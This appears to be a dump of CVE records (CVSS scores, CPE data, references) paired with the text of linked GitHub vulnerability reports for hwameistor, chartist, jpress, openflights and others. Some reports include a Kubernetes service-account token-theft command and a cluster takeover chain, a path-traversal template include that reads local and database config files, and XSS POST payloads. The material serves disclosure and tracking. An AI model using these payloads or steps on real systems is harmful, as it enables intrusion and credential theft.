[ { "source": "security-advisories@github.com", "tags": [ "Product" ], "url": "https://github.com/hwameistor/hwameistor/blob/main/helm/hwameistor/templates/clusterrole.yaml" }, { "source": "security-advisories@github.com", "tags": [ "Patch" ], "url": "https://github.com/hwameistor/hwameistor/commit/edf4cebed73cadd230bf97eab65c5311f2858450" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/hwameistor/hwameistor/issues/1457" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/hwameistor/hwameistor/issues/1460" }, { "source": "security-advisories@github.com", "tags": [ "Vendor Advisory" ], "url": "https://github.com/hwameistor/hwameistor/security/advisories/GHSA-mgwr-h7mv-fh29" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hwameistor:hwameistor:*:*:*:*:*:go:*:*", "matchCriteriaId": "789E23CD-2922-45F8-BD3A-AD17E16D06CA", "versionEndExcluding": "0.14.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "200" ]
200
https://github.com/hwameistor/hwameistor/issues/1460
[ "Issue Tracking" ]
github.com
[ "hwameistor", "hwameistor" ]
Dear Team Members: Greetings! Our team is very interested in your project and we recently identified a potential RBAC security risk while doing a security assessment of your project. Therefore, we would like to report it to you and provide you with the relevant details so that you can fix and improve it accordingly. I couldn't find a private email to report security risks, so I raised this issue. If there is anything inappropriate about it, I hope you can forgive me. Details: I found that the project has a cluster role named hwameistor-role and that hwameistor-role has been granted [*] *.(https://github.com/hwameistor/hwameistor/blob/main/helm/hwameistor/templates/clusterrole.yaml) This means that he can perform any operations on all resources in the cluster. I believe that granting such privileges is excessive, does not comply with the principle of least privilege, and is a potential vulnerability. An attacker could impersonate the service account bound to this ClusterRole and use its high-risk privileges to list confidential information across the cluster. By combining the permissions of other roles, an attacker could elevate the privileges and further take over the entire cluster. we constructed the following attack vectors. First, you need to get a token for the ServiceAccount that has this high-risk privilege. If you are already in a Pod and have this override, you can directly run the following command to get the token: cat /var/run/secrets/[[kubernetes.io/serviceaccount/](http://kubernetes.io/serviceaccount/)](http://kubernetes.io/serviceaccount/) token. If you are on a node other than a Pod, you can run the following command to get the kubectl describe secret . Use the obtained token information to authenticate with the API server. By including the token in the request, you can be recognized as a legitimate user with a ServiceAccount and gain all privileges associated with the ServiceAccount. As a result, this ServiceAccount identity can be used to list all secrets in the cluster. We give two ways to further utilize ServiceAccount Token with other privileges to take over the cluster: Method 1: Elevation of Privilege by Utilizing ServiceAccount Token Bound to ClusterAdmin Directly use a Token with the ClusterAdmin role permissions that has the authority to control the entire cluster. By authenticating with this token, you can gain full control of the cluster. Method 2: Create Privileged Containers with ServiceAccount Token with create pods permission You can use this ServiceAccount Token to create a privileged container that mounts the root directory and schedules it to the master node in a taint-tolerant way, so that you can access and leak the master node's kubeconfig configuration file. In this way you can take over the entire cluster. For the above attack chain we have developed exploit code and uploaded it to github: https://github.com/HouqiyuA/k8s-rbac-poc Mitigation methods are explored: Carefully evaluate the permissions required for each user or service account to ensure that it is following the principle of least privilege and to avoid over-authorization. If list secrets is a required permission, consider using more granular RBAC rules. Role Binding can be used to grant list secrets permissions instead of ClusterRole, which restricts permissions to specific namespaces or resources rather than the entire cluster. Isolate different applications into different namespaces and use namespace-level RBAC rules to restrict access. This reduces the risk of privilege leakage across namespaces Looking forward to hearing from you and discussing this risk in more detail with us, thank you very much for your time and attention. Best wishes. HouqiyuA
A potential risk in hwameistor that could lead to takeover the cluster
https://api.github.com/repos/hwameistor/hwameistor/issues/1460/comments
2
2024-04-29T07:56:29Z
2024-07-25T09:06:47Z
https://github.com/hwameistor/hwameistor/issues/1460
2,268,367,950
1,460
6,229
CVE-2024-45435
2024-08-29T03:15:05.357
Chartist 1.x through 1.3.0 allows Prototype Pollution via the extend function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://gist.github.com/tariqhawis/c67177164d3b7975210caddb25b60d62" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/chartist-js/chartist/issues/1427" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:chartist:chartist:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "EC330989-A887-440D-9A6A-AFE444D028C7", "versionEndExcluding": null, "versionEndIncluding": "1.3.0", "versionStartExcluding": null, "versionStartIncluding": "1.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1321" ]
1321
https://github.com/chartist-js/chartist/issues/1427
[ "Issue Tracking" ]
github.com
[ "chartist-js", "chartist" ]
### Would you like to work on a fix? - [ ] Check this if you would like to implement a PR, we are more than happy to help you go through the process. ### Current and expected behavior ### Overview A Prototype Pollution vulnerability Affecting chartist , versions >=1.0.0 <=1.3.0, due to missing check if the argument resolves to the object prototype. This allow the attacker to inject malicious object property using the built-in Object property `__proto__` which recursively assigned to all the objects in the program. ### Reproduction _sent directly to the maintainer's email_ ### Chartist version 1.3.0 ### Possible solution > + Freeze the root prototype using Object.freeze > + Require schema validation of JSON input. > + Avoid using unsafe recursive merge functions. > + Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution. > + As a best practice use Map instead of Object
[Bug]: Prototype Pollution Vulnerability Affecting chartist module, versions >=1.0.0 <=1.3.0
https://api.github.com/repos/chartist-js/chartist/issues/1427/comments
3
2024-03-29T20:52:33Z
2025-04-07T18:21:10Z
https://github.com/chartist-js/chartist/issues/1427
2,215,986,311
1,427
6,230
CVE-2024-8297
2024-08-29T13:15:07.370
A vulnerability was found in kitsada8621 Digital Library Management System 1.0. It has been classified as problematic. Affected is the function JwtRefreshAuth of the file middleware/jwt_refresh_token_middleware.go. The manipulation of the argument Authorization leads to improper output neutralization for logs. It is possible to launch the attack remotely. The name of the patch is 81b3336b4c9240f0bf50c13cb8375cf860d945f1. It is recommended to apply a patch to fix this issue.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/kitsada8621/Digital-Library-Management-System/commit/81b3336b4c9240f0bf50c13cb8375cf860d945f1" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking", "Product" ], "url": "https://github.com/kitsada8621/Digital-Library-Management-System/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.276072" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.276072" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.394613" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kitsada8621:digital_library_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "D1405CD5-ECA2-4027-B5A3-89E60FDF28E4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "116" ]
116
https://github.com/kitsada8621/Digital-Library-Management-System/issues/1
[ "Issue Tracking", "Product" ]
github.com
[ "kitsada8621", "Digital-Library-Management-System" ]
``` header := ctx.GetHeader("Authorization") if header == "" { ctx.JSON(http.StatusUnauthorized, models.ResponseJson{ Success: false, Message: "authorization is required", }) ctx.Abort() return } parts := strings.Split(header, " ") fmt.Println(parts) ``` In line 28 of the middleware/jwt_refresh_token_middleware.go file, the program uses fmt.Println(parts) to print the split header (the value obtained from the Authorization header). This is a potential security risk because if the value is controlled by the user (which appears to be the case based on the code snippet provided), an attacker may attempt to inject malicious content in the header to perform a log injection attack. Using unverified or uncleaned user input during logging may lead to security issues such as sensitive information disclosure and tampering of log files. This situation is one of the common forms of log injection vulnerability. Therefore, you should not output unprocessed user input directly into the log file.
log-injection in middleware/jwt_refresh_token_middleware.go
https://api.github.com/repos/kitsada8621/Digital-Library-Management-System/issues/1/comments
0
2024-08-20T10:34:12Z
2024-08-20T10:34:12Z
https://github.com/kitsada8621/Digital-Library-Management-System/issues/1
2,475,300,907
1
6,231
CVE-2024-8304
2024-08-29T15:15:35.070
A vulnerability has been found in jpress up to 5.1.1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/template/edit of the component Template Module Handler. The manipulation leads to path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "MULTIPLE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 6.4, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 4.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.1, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "HIGH", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/JPressProjects/jpress/issues/189" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.276079" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.276079" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.396425" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpress:jpress:*:*:*:*:*:*:*:*", "matchCriteriaId": "F631C7C4-C4DB-4188-A24F-5E127F52571A", "versionEndExcluding": null, "versionEndIncluding": "5.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/JPressProjects/jpress/issues/189
[ "Exploit", "Issue Tracking" ]
github.com
[ "JPressProjects", "jpress" ]
## Affected version ≤Jpress v5.1.1 ## Vendor https://github.com/JPressProjects/jpress ## vulnerability File jfinal-5.1.9.jar ## Description Enter the background at [http://127.0.0.1:8080/admin/login](http://127.0.0.1:8080/admin/login). In System Management → Template → Edit Module, select to edit index.html, add a line of code in the file, and click Update File. ```text #include("../../../../../../../../../Windows/win.ini") ``` ![image](https://github.com/user-attachments/assets/7bddc924-58b2-49aa-b21e-a6fe873f412b) Then visit the homepage, and you can see the content of the local `c:\Windows\win.ini` file. ![image](https://github.com/user-attachments/assets/e48dceb0-8c2e-47e6-a5ce-cddd6a04e1b0) Modify the code to `../../WEB-INF/classes/jboot.properties`, and we can read the local database configuration file. ![image](https://github.com/user-attachments/assets/c196efdb-988e-4947-93a6-4381c40c06e4) ![image](https://github.com/user-attachments/assets/3d10c7c4-3c69-4016-9dbc-5e47f8aaa26b)
jpress has an arbitrary file read vulnerability
https://api.github.com/repos/JPressProjects/jpress/issues/189/comments
0
2024-08-22T14:51:08Z
2024-08-22T14:51:08Z
https://github.com/JPressProjects/jpress/issues/189
2,480,992,964
189
6,232
CVE-2024-44930
2024-08-29T18:15:14.830
Serilog before v2.1.0 was discovered to contain a Client IP Spoofing vulnerability, which allows attackers to falsify their IP addresses by specifying an arbitrary IP as a value of X-Forwarded-For or Client-Ip headers while performing HTTP requests.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 2.5, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/serilog-contrib/serilog-enrichers-clientinfo/issues/29" }, { "source": "cve@mitre.org", "tags": [ "Release Notes" ], "url": "https://github.com/serilog-contrib/serilog-enrichers-clientinfo/releases/tag/v2.1.0" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:serilog-contrib:serilog-enrichers-clientinfo:*:*:*:*:*:*:*:*", "matchCriteriaId": "88E20775-E328-4A4C-AA68-7AC7BF303C43", "versionEndExcluding": "2.1.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/serilog-contrib/serilog-enrichers-clientinfo/issues/29
[ "Issue Tracking" ]
github.com
[ "serilog-contrib", "serilog-enrichers-clientinfo" ]
Instead of directly reading the X-Forwarded-Header by default, it's much better to use the ForwardedHeaders middleware (https://learn.microsoft.com/en-us/aspnet/core/host-and-deploy/proxy-load-balancer?view=aspnetcore-7.0) and then let that middleware set the HttpContext.Connection.RemoteIpAddress so we only log that information instead. If, for some reason someone don't want to use that, then the ClientIp enricher could read this by header. Since there's a danger of IP spoofing (which this enricher does not have any protection against), it's better to let the ForwardedHeader middleware and configuration take care of this (the KnownNetworks and KnownProxies configuration). I can implement a suggestion for this (by making it possible to set a configuration to disable reading headers or similar), but I'd personally prefer if the default would be changed to not read X-Forwarded-For (which would be a breaking change). Maybe something for a 3.0 release?
ClientIp enricher should have a way to not read X-Forwarded-For
https://api.github.com/repos/serilog-contrib/serilog-enrichers-clientinfo/issues/29/comments
8
2023-10-29T19:52:46Z
2024-08-29T20:50:35Z
https://github.com/serilog-contrib/serilog-enrichers-clientinfo/issues/29
1,967,132,009
29
6,233
CVE-2024-41345
2024-08-29T20:15:08.393
openflights commit 5234b5b is vulnerable to Cross-Site Scripting (XSS) via php/trip.php
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/jpatokal/openflights/issues/1480" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpatokal:openflights:2024-08-20:*:*:*:*:*:*:*", "matchCriteriaId": "DDD7A74D-22DA-4AB3-A155-268E6FE10A96", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/jpatokal/openflights/issues/1480
[ "Exploit", "Issue Tracking" ]
github.com
[ "jpatokal", "openflights" ]
Hello, I would like to report for a XSS vulnerability in openflights. The path of the vulnerability. In file https://github.com/jpatokal/openflights/blob/master/php/trip.php ``` $type = $_POST["type"]; // Line 6 $trid = $_POST["trid"] ?? null; // Line 7 if ($type != "NEW" && (!$trid || $trid == 0)) { // Line 9 die('0;Trip ID ' . $trid . ' invalid'); } $uid = $_SESSION["uid"]; // Line 13 if (!$uid || empty($uid)) { // Line 14 die('0;' . _("Your session has timed out, please log in again.")); } ... switch ($type) { ... default: die('0;Unknown operation ' . $type); // Line 55 } ``` We see that there is no check between the input and output. On Line 6 and Line 7 , user input from `$_POST["type"]` and `$_POST["trid"]`. On line 9, requires that the trid is not empty. On line 14, the login status is checked. Finally, Line 55 will print $type, resulting in XSS. So,the Poc: First, visit http://cmstest.openflights.com/php/login.php to login.(This url is built locally to access the actual login page depending on the situation). POST `trid=1&type=<script>alert('xss')</script>` Manual verification: ![11](https://github.com/jpatokal/openflights/assets/134520528/1dcb495a-e015-4f97-baac-230293bcb37a) ![12](https://github.com/jpatokal/openflights/assets/134520528/97841be8-4e45-4746-92f6-c28e1c3b9d8d)
XSS vulnerability_4
https://api.github.com/repos/jpatokal/openflights/issues/1480/comments
0
2024-07-09T03:16:34Z
2024-08-22T11:54:32Z
https://github.com/jpatokal/openflights/issues/1480
2,397,005,522
1,480
6,234
CVE-2024-41346
2024-08-29T20:15:08.483
openflights commit 5234b5b is vulnerable to Cross-Site Scripting (XSS) via php/submit.php
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/jpatokal/openflights/issues/1479" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpatokal:openflights:2024-08-20:*:*:*:*:*:*:*", "matchCriteriaId": "DDD7A74D-22DA-4AB3-A155-268E6FE10A96", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/jpatokal/openflights/issues/1479
[ "Exploit", "Issue Tracking" ]
github.com
[ "jpatokal", "openflights" ]
Hello, I would like to report for a XSS vulnerability in openflights. The path of the vulnerability. In file https://github.com/jpatokal/openflights/blob/master/php/submit.php ``` $uid = $_SESSION["uid"]; // Line 4 if (!$uid || empty($uid)) { // Line 5 printf(_("Not logged in, aborting")); exit; } ... $param = $_POST["param"]; // Line 25 ... switch ($param) { ... default: die('0;Unknown operation ' . $param); // Line 206 } ``` We see that there is no check between the input and output. On line 5, the login status is checked. In Line 25, user input from `$_POST["param"] ` ,and then Line 206 will print $param, resulting in XSS. So,the Poc: First, visit http://cmstest.openflights.com/php/login.php to login.(This url is built locally to access the actual login page depending on the situation). POST `param=<script>alert('xss')</script>` Manual verification: ![9](https://github.com/jpatokal/openflights/assets/134520528/4efc7e4c-674f-476b-9d5a-9cd0d570af3c) ![10](https://github.com/jpatokal/openflights/assets/134520528/fec28bd6-9ee9-4202-b2be-f9feec0c7ac2)
XSS vulnerability_3
https://api.github.com/repos/jpatokal/openflights/issues/1479/comments
0
2024-07-09T03:15:53Z
2024-08-22T11:54:32Z
https://github.com/jpatokal/openflights/issues/1479
2,397,004,832
1,479
6,235
CVE-2024-41347
2024-08-29T20:15:08.573
openflights commit 5234b5b is vulnerable to Cross-Site Scripting (XSS) via php/settings.php
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/jpatokal/openflights/issues/1477" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpatokal:openflights:2024-08-20:*:*:*:*:*:*:*", "matchCriteriaId": "DDD7A74D-22DA-4AB3-A155-268E6FE10A96", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/jpatokal/openflights/issues/1477
[ "Exploit", "Issue Tracking" ]
github.com
[ "jpatokal", "openflights" ]
